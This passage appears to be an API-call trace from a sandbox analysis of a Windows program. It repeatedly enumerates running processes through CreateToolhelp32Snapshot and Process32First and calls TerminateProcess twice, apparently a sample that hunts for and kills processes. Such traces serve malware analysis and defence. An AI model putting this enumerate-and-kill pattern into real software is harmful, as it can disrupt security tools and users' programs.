hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.245] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.250] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.343] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.432] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.543] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.674] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.774] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.868] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.945] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.949] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0067.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0067.795] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0067.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0067.870] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0068.504] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.978] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0068.981] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0069.269] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.677] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0069.682] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0071.928] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.046] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0072.051] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0072.799] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0072.877] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0073.559] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0073.641] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0073.705] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0074.204] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0074.615] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0074.881] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.196] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0075.201] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf0 | out: lppe=0x292fdf0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.276] TerminateProcess (hProcess=0x170, uExitCode=0x0) returned 1 [0075.572] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0075.576] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0075.868] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0076.994] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0077.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0077.391] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0077.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0077.706] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0077.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0077.999] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.150] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.476] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.480] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.672] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.916] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.202] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.443] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.448] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.693] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.698] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.884] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf0 | out: lppe=0x292fdf0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.979] TerminateProcess (hProcess=0x16c, uExitCode=0x0) returned 1 [0081.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.067] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.259] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.478] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.663] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.900] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.152] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.338] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.585] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.588] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.832] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.005] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.209] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.442] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.733] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.006] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.330] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.548] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.793] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.798] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0085.064] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0085.500] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0085.720] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0086.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0086.031] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0091.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0091.964] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.353] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0092.365] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0092.711] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0093.021] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.313] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0093.318] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0093.543] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 